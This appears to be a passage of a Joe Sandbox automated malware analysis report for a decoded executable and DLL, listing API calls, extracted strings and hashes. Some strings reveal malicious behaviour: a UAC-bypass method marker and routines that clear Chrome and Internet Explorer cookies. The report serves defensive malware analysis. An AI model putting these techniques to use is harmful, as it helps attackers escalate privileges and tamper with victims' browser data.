                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                    • String ID:
                                                                    • API String ID: 1324828854-0
                                                                    • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                    • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                    • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                    • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                    • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                    • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                    • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                    • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                    • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                    APIs
                                                                      • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                                      • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                                                      • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                                                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                                                    • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                    • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                    • API String ID: 1133728706-4073444585
                                                                    • Opcode ID: 0132c8798f42d3c2ae862f3d3835a9384a56be23f9014ebf57724bc22a324f14
                                                                    • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                                                    • Opcode Fuzzy Hash: 0132c8798f42d3c2ae862f3d3835a9384a56be23f9014ebf57724bc22a324f14
                                                                    • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 934edf86da25d837fa7b61c38a686264b457019a14f29bbb32a15566fa7518be
                                                                    • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                                                    • Opcode Fuzzy Hash: 934edf86da25d837fa7b61c38a686264b457019a14f29bbb32a15566fa7518be
                                                                    • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                                                    APIs
                                                                      • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                                                    • _free.LIBCMT ref: 00450F48
                                                                      • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                    • _free.LIBCMT ref: 00450F53
                                                                    • _free.LIBCMT ref: 00450F5E
                                                                    • _free.LIBCMT ref: 00450FB2
                                                                    • _free.LIBCMT ref: 00450FBD
                                                                    • _free.LIBCMT ref: 00450FC8
                                                                    • _free.LIBCMT ref: 00450FD3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                    • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                                                    • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                    • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                                                    APIs
                                                                      • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                    • _free.LIBCMT ref: 100092AB
                                                                      • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                      • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                    • _free.LIBCMT ref: 100092B6
                                                                    • _free.LIBCMT ref: 100092C1
                                                                    • _free.LIBCMT ref: 10009315
                                                                    • _free.LIBCMT ref: 10009320
                                                                    • _free.LIBCMT ref: 1000932B
                                                                    • _free.LIBCMT ref: 10009336
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                    • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                    • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                    • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                                                    • int.LIBCPMT ref: 00411183
                                                                      • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                                                      • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                                                    • std::_Facet_Register.LIBCPMT ref: 004111C3
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                    • String ID: (mG
                                                                    • API String ID: 2536120697-4059303827
                                                                    • Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                                                    • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                                                    • Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                                                    • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                                                    • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                                    • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                                                    • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                                    • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                                                    APIs
                                                                    • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe), ref: 004075D0
                                                                      • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                                                      • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                                    • CoUninitialize.OLE32 ref: 00407629
                                                                    Strings
                                                                    • [+] before ShellExec, xrefs: 004075F1
                                                                    • [+] ShellExec success, xrefs: 0040760E
                                                                    • C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, xrefs: 004075B0, 004075B3, 00407605
                                                                    • [+] ucmCMLuaUtilShellExecMethod, xrefs: 004075B5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InitializeObjectUninitialize_wcslen
                                                                    • String ID: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                    • API String ID: 3851391207-2505885086
                                                                    • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                                                    • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                                                    • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                                                    • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                                                    APIs
                                                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                                                    • GetLastError.KERNEL32 ref: 0040BAE7
                                                                    Strings
                                                                    • UserProfile, xrefs: 0040BAAD
                                                                    • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                                                    • [Chrome Cookies not found], xrefs: 0040BB01
                                                                    • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DeleteErrorFileLast
                                                                    • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                    • API String ID: 2018770650-304995407
                                                                    • Opcode ID: 167214da9fedc2eb77704bddeaa2e6e6e0e18728c289feeb4f38cfb7b5f99995
                                                                    • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                                                    • Opcode Fuzzy Hash: 167214da9fedc2eb77704bddeaa2e6e6e0e18728c289feeb4f38cfb7b5f99995
                                                                    • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                                                    Strings
                                                                    • hdF, xrefs: 004076A9
                                                                    • C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, xrefs: 004076C4
                                                                    • SG, xrefs: 004076DA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: SG$C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe$hdF
                                                                    • API String ID: 0-3338387842
                                                                    • Opcode ID: a134d68e00a23aec850ce34bab2ba566fca7fbefa287618f70ce8b1be92ee060
                                                                    • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                                                    • Opcode Fuzzy Hash: a134d68e00a23aec850ce34bab2ba566fca7fbefa287618f70ce8b1be92ee060
                                                                    • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                                                    APIs
                                                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                    • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                                                                    • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                                                                    • Sleep.KERNEL32(00002710), ref: 0041AE07
                                                                    • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                    • String ID: Alarm triggered$`#v
                                                                    • API String ID: 614609389-3049340936
                                                                    • Opcode ID: 8320d0a8477b2dfdf5ffede3a6159dd71cddf314a322f93aa69cf56e5021b822
                                                                    • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                                                                    • Opcode Fuzzy Hash: 8320d0a8477b2dfdf5ffede3a6159dd71cddf314a322f93aa69cf56e5021b822
                                                                    • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                                                                    APIs
                                                                    • _free.LIBCMT ref: 1000536F
                                                                      • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                      • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                    • _free.LIBCMT ref: 10005381
                                                                    • _free.LIBCMT ref: 10005394
                                                                    • _free.LIBCMT ref: 100053A5
                                                                    • _free.LIBCMT ref: 100053B6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID: {x
                                                                    • API String ID: 776569668-1982123439
                                                                    • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                    • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                    • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                    • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                    APIs
                                                                    • __allrem.LIBCMT ref: 0043AC69
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                                                    • __allrem.LIBCMT ref: 0043AC9C
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                                                    • __allrem.LIBCMT ref: 0043ACD1
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                    • String ID:
                                                                    • API String ID: 1992179935-0
                                                                    • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                                    • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                                                    • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                                    • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                    • __freea.LIBCMT ref: 10008A08
                                                                      • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                    • __freea.LIBCMT ref: 10008A11
                                                                    • __freea.LIBCMT ref: 10008A36
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1414292761-0
                                                                    • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                    • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                    • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                    • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                                                                      • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
